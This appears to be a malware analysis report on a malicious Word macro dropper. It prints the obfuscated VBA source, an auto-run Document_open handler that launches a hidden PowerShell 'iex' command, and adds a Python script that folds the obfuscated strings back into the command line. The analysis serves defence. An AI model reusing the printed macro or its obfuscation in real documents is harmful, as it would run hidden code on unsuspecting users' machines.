Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4e6f8de2720bf7ea…

MALICIOUS

Office (OLE)

Size: 95.2 KB
Created: 2018-06-15 14:50:00
Authoring application: Microsoft Office Word
First seen: 2018-11-13
MD5: a32d11da5101c205635c01cffd09dad7
SHA-1: b53e99cad6c526e5bd84b8b30e44fba0bae3ac45
SHA-256: 4e6f8de2720bf7eac053b86eb0f68496eab21d97075bcde468df387f9abf9310
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution

The sample is a malicious Office (OLE) document carrying VBA macros. The critical heuristic OLE_VBA_SHELL flags a VBA.Shell() call, and OLE_VBA_DOCOPEN together with OLE_VBA_PCODE_AUTOEXEC_EXEC tie that call to the Document_open auto-execution handler, so the command runs as soon as the document is opened with macros enabled. The extracted source shows the Shell() argument being assembled at run time from string fragments, Chr() calls and undeclared variables (which VBA evaluates as Empty, i.e. 0 in arithmetic and "" in concatenation), with junk arithmetic statements padded between the useful lines. The visible fragments spell out a PowerShell command line: the construct $ENv:coMspec[4,26,25]-jOIn'' indexes the cmd.exe path in the ComSpec environment variable to produce the string "iex" (Invoke-Expression), and the Shell() window-style argument (86352 - 86352) evaluates to 0, vbHide, so no console window is shown. The encoded string handed to Invoke-Expression is cut off in the preview below, so the second stage itself is not recoverable from this report; the ClamAV signature name, Doc.Dropper.Agent-6599226-0, classifies the document as a dropper, which is consistent with the visible macro behaviour.

Heuristics (6)

  • CLAMAV_DETECTION (critical): ClamAV: Doc.Dropper.Agent-6599226-0
    ClamAV detected this file as malware: Doc.Dropper.Agent-6599226-0
  • OLE_VBA_MACROS (medium, 3 related findings): VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_SHELL (critical): Shell() call in VBA
    The VBA source contains a call to Shell(), which launches an external command line.
  • OLE_VBA_DOCOPEN (high): Document_Open macro
    The document defines a Document_Open handler, which Word runs automatically when the document is opened with macros enabled.
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI that Office writes into any document containing drawing objects; it is not a network indicator and is not something the macro contacts, so it should not be treated as a download or C2 URL.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13985 bytes
SHA-256: 1e979aeaf713b96301d00f4e4aa3cd27ed0047bb86884eb4eb3f8c23dbd963ae
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ZiGLvWCjQH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function vaWbZmwj()
On Error Resume Next
WzjnJ = 79387 + DYRiL + (21438 * CDbl(pnQajb) - WApwH / CSng(84612) - KiSjZM / Hex(rqfPK) + 84287 - 66356)
jihZio = TOXip
wzwOzA = tpBzQs - wzlwpz / 92980 / KVjlNk - 223327908 + Hex(joCJdf) * iLMJt - Round(94583)
QDOTp = Sqr(52816)
mciNn = 27696 + FNuGO + (27184 * CDbl(PZmfEz) - zIIwwS / CSng(63480) - UCftS / Hex(FhwWiq) + 70028 - 199)
NNbpOR = dUAdk
UZkSoU = Rowaz - raUvtK / 85292 / IaJKzp - 223327908 + Hex(VwdrCm) * GJAukK - Round(62890)
VaAop = Sqr(6937)
zbIqf = 68085 + qSiwGK + (39202 * CDbl(vwZhH) - rtZqOs / CSng(29634) - jMrsVH / Hex(sEFbkr) + 31369 - 64122)
iPlHbu = FufLu
nlHijA = qhziW - NoNiC / 90292 / FXibL - 223327908 + Hex(pzSVjn) * NFjzw - Round(17609)
ARZtKv = Sqr(11108)
AmYPD = 62694 + wLTYL + (26971 * CDbl(PqIENf) - riVUnt / CSng(1463) - CUFGcn / Hex(ppjSb) + 19885 - 85224)
okCuh = kncMP
XzjNJH = vPmWw - zSFlI / 91062 / TYuEj - 223327908 + Hex(KIdGHF) * XzGWO - Round(57616)
Mqjmv = Sqr(87445)
vaWbZmwj = LPFlOIKPiio + VBA.Shell(LmvdHwl + Chr(VwAbVnAGDhU + vbKeyP + wCakjzjTzz) + "owers" + kmDpthBKo + DEPERjIhdLL + nJHJjKb + ofuNNj, 86352 - 86352)
zsLwEf = 57295 + zuSIf + (31906 * CDbl(kCLiXi) - OZIOwY / CSng(30101) - NsMdFO / Hex(wBrlT) + 31048 - 84765)
mtQjF = jVulu
XzRdm = qjFuIj - wBKiYD / 18505 / mKRWzB - 223327908 + Hex(JFRUf) * odnkaI - Round(22820)
HApSwT = Sqr(66951)
KlpzH = 77777 + cXAdoB + (70225 * CDbl(XXuwv) - jGkKKw / CSng(82298) - fQrEF / Hex(ConclS) + 67785 - 75068)
fZHLB = zioZQ
bUbiiE = wswOsj - jvFFjj / 34571 / cOtco - 223327908 + Hex(BfpmYW) * kiAYj - Round(97479)
wTJQBb = Sqr(13369)
End Function
Private Sub Document_open()
On Error Resume Next
sMkCQ = 96260 + MJcUMW + (98828 * CDbl(EhAkm) - Htzhd / CSng(14097) - UttAuA / Hex(RQVSAk) + 64200 - 21901)
tUUuuK = OLvsXc
npwkTl = mqIrQ - TSWHzo / 22058 / jClwBY - 223327908 + Hex(qWpOiB) * FDHwf - Round(1586)
ahnkzG = Sqr(27972)
DnLnR = 23440 + wTTdl + (63492 * CDbl(NSzAJ) - CZbvB / CSng(84899) - jZtrw / Hex(rJRsUh) + 36981 - 59558)
JbpvJG = RdzRD
dwIsId = PmZtm - abjKp / 93275 / afTpfS - 223327908 + Hex(TjrPSh) * Qvojjj - Round(10016)
qHMJcA = Sqr(4865)
vaWbZmwj
cSMpts = 61187 + JbFzKj + (84453 * CDbl(GPqwzL) - nGUnD / CSng(84436) - OaBRSV / Hex(tnMzm) + 96712 - 95535)
hHZsLP = fzmDGY
bAQBZ = ZFbCjM - vsOVEN / 54583 / zKNSzs - 223327908 + Hex(nQTwa) * aRBUw - Round(21083)
OFznYj = Sqr(76482)
LmbpD = 67510 + qKSLjk + (73272 * CDbl(VbMBI) - OXiaw / CSng(65755) - YBBwzd / Hex(Xwbzk) + 43272 - 39368)
GVjRk = TNlRT
mZPLRz = zPHAi - JRNkG / 43454 / XzORlh - 223327908 + Hex(kUaOj) * aOcin - Round(23778)
nJAhw = Sqr(74778)
End Sub


Attribute VB_Name = "JAMqjnCuV"
Function kmDpthBKo()
On Error Resume Next
EwJiDi = jiWEU
ihuaZQ = Sqr(68091)
VNLbt = qszEK - iHuzjE / 10497 / dkiVMY - 223327908 + Hex(WlLkS) * EzHDzj - Round(94383)
EvZlO = 88831 + CaQOI + (58213 * CDbl(RTIIs) - IsEjmK / CSng(68597) - UTVOZ / Hex(IVpYd) + 43722 - 62122)
WZYihiAhi = "HeLL  .( $ENv:c" + "oMspec" + "[4,26,25]-jOIn'" + "') ( " + Chr(34) + "$( SeT-" + "iteM  '" + "VaRIaBLE:ofs'" + " '') " + Chr(34) + " + [sTRiN" + "g]('54m113g71T9"
zYZMiB = nurVL
kFUYXO = Sqr(861)
FwDUGY = jlzGlP - EkIMw / 27963 / ENIIpb - 223327908 + Hex(pFzcit) * TEjKo - Round(88373)
mkjqPU = 94270 + GoTrJ + (57865 * CDbl(mwlYI) - jMEJd / CSng(44003) - jrTPHB / Hex(NYNhL) + 119 - 18595)
iOkGj = "0}101}126a11" + "3Z50}47U50<1" + "24U119a1" + "01U63<125" + "Z112Z120m1" + "19<113{102" + "m5" + "0Z96}115<124g11" + "8a125b" + "127b41g54"
vNtYaQ = jQLSl
OQVDJ = Sqr(29530)
oIKRL = ijcBlj - rKTGru / 2832 / HIQFN - 223327908 + Hex(lzOLCj) * BfzfT - Round(37938)
BiuMR = 93976 + rjwdCW + (12634 * CDbl(jbCHUD) - AOkPL / CSng(97172) - poKwi / Hex(kJUtr) + 28887 - 79154)
JBPNnSBLhv = "T123g84m121Z118" + "}68b118a50T4" + "7}50" + "a124Z1" + "
... (truncated)
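To read the command line that the Shell() call in the listing above assembles, the concatenation has to be folded the way VBA evaluates it: string literals and Chr() calls resolve directly, vbKeyP is the key code 80, and the many undeclared identifiers are Empty (0 in arithmetic, "" in concatenation), so they contribute nothing. The Python below is an added example written for this page; it is not the analysis tool's code and not part of the sample. It walks the macro source, folds every string assignment in order, then resolves the first argument of Shell() and its window-style argument. SAMPLE_MACRO is constructed from lines of the preview above with the junk arithmetic dropped; mapping the helper function kmDpthBKo to its WZYihiAhi string is an assumption, because the preview is cut off before that function's return statement; and the ComSpec path in comspec_index_decode is the default for a Windows install, not a value taken from the sample.

```python
from __future__ import annotations
import re

# vbKeyA..vbKeyZ are the ASCII codes 65..90. Every other bare identifier in the sample
# is an undeclared Variant (Empty), which VBA coerces to 0 in arithmetic and "" in text.
VB_KEY_CONSTS = {f"vbKey{c}": ord(c) for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZ"}
_STR_LIT = re.compile(r'"((?:[^"]|"")*)"')


def split_top_level(s: str, sep: str) -> list[str]:
    """Split on sep, ignoring occurrences inside parentheses or "..." literals."""
    parts, depth, in_str = [""], 0, False
    for ch in s:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            depth += (ch == "(") - (ch == ")")
            if ch == sep and depth == 0:
                parts.append("")
                continue
        parts[-1] += ch
    return parts


def eval_int(expr: str) -> int:
    """+/- arithmetic as used in Chr() arguments and Shell()'s window-style argument.
    Identifiers become their vbKey code or 0; only digits, + - ( ) may remain."""
    expr = re.sub(r"[A-Za-z_]\w*", lambda m: str(VB_KEY_CONSTS.get(m.group(0), 0)), expr)
    if not re.fullmatch(r"[\d\s+\-()]+", expr):
        raise ValueError(f"unsupported arithmetic: {expr!r}")
    return int(eval(expr))  # safe: the allowlist above admits no names or calls


def fold_concat(expr: str, env: dict[str, str]) -> str:
    """Resolve  a + "lit" + Chr(n) + b  to the string VBA would build."""
    out = []
    for tok in (t.strip() for t in split_top_level(expr, "+")):
        if m := _STR_LIT.fullmatch(tok):
            out.append(m.group(1).replace('""', '"'))
        elif m := re.fullmatch(r"Chr\((.*)\)", tok, re.I):
            out.append(chr(eval_int(m.group(1))))
        else:
            out.append(env.get(tok, ""))  # unknown identifier: Empty, i.e. ""
    return "".join(out)


def extract_call_args(src: str, func: str) -> list[str] | None:
    """Top-level argument expressions of the first func(...) call in src."""
    m = re.search(rf"\b{func}\(", src)
    if not m:
        return None
    start, depth, in_str = m.end(), 0, False
    for i in range(start, len(src)):
        ch = src[i]
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == ")" and depth == 0:
                return split_top_level(src[start:i], ",")
            depth += (ch == "(") - (ch == ")")
    return None


def recover_shell_command(macro_src: str, aliases: dict[str, str] | None = None):
    """Fold every string assignment in source order, then resolve Shell()'s command line
    and window style. aliases maps an identifier (e.g. a helper function name) to the
    string variable it stands for."""
    env: dict[str, str] = {}
    for m in re.finditer(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$", macro_src, re.M):
        name, expr = m.groups()
        if '"' in expr:  # the numeric junk statements carry no string fragments
            env[name] = fold_concat(expr, env)
    for alias, target in (aliases or {}).items():
        env[alias] = env.get(target, "")
    args = extract_call_args(macro_src, "Shell")
    if not args:
        return None
    style = eval_int(args[1]) if len(args) > 1 else 1  # Shell() default is vbNormalFocus
    return fold_concat(args[0], env), style


def comspec_index_decode(indices, comspec: str = r"C:\WINDOWS\system32\cmd.exe") -> str:
    """What PowerShell's  $env:ComSpec[i,j,k] -join ''  yields on a default install."""
    return "".join(comspec[i] for i in indices)


# Constructed input: lines copied from the macro preview in this report, with the
# junk arithmetic between them dropped and the truncated second string omitted.
SAMPLE_MACRO = """Function vaWbZmwj()
On Error Resume Next
vaWbZmwj = LPFlOIKPiio + VBA.Shell(LmvdHwl + Chr(VwAbVnAGDhU + vbKeyP + wCakjzjTzz) + "owers" + kmDpthBKo + DEPERjIhdLL + nJHJjKb + ofuNNj, 86352 - 86352)
End Function
Private Sub Document_open()
vaWbZmwj
End Sub
Function kmDpthBKo()
WZYihiAhi = "HeLL  .( $ENv:c" + "oMspec" + "[4,26,25]-jOIn'" + "') ( " + Chr(34) + "$( SeT-" + "iteM  '" + "VaRIaBLE:ofs'" + " '') " + Chr(34) + " + [sTRiN" + "g]('54m113g71T9"
End Function
"""

if __name__ == "__main__":
    # Assumption: kmDpthBKo() returns WZYihiAhi; the preview ends before its return statement.
    cmd, style = recover_shell_command(SAMPLE_MACRO, aliases={"kmDpthBKo": "WZYihiAhi"})
    print(f"Shell() window style {style} (0 = vbHide)\n{cmd}")
    print("$env:ComSpec[4,26,25] -join '' ->", comspec_index_decode([4, 26, 25]))
```

Running it yields a window style of 0 (vbHide) and a command line beginning PowersHeLL  .( $ENv:coMspec[4,26,25]-jOIn'') ( ... : characters 4, 26 and 25 of C:\WINDOWS\system32\cmd.exe are I, e and x, so .( 'Iex' ) calls Invoke-Expression on the string that follows, and Set-Item Variable:ofs '' clears the output field separator, a usual preparation for casting an array of decoded characters to one string without spaces. The string literal after [sTRiNg]( is exactly where the preview stops, so the decoding routine that turns it into the second-stage command cannot be reconstructed from this page. The same folding works on any macro in this family as long as the fragments are plain literals, Chr() calls and variables; a sample that builds strings through StrReverse, Replace or Mid would need those functions modelled as well.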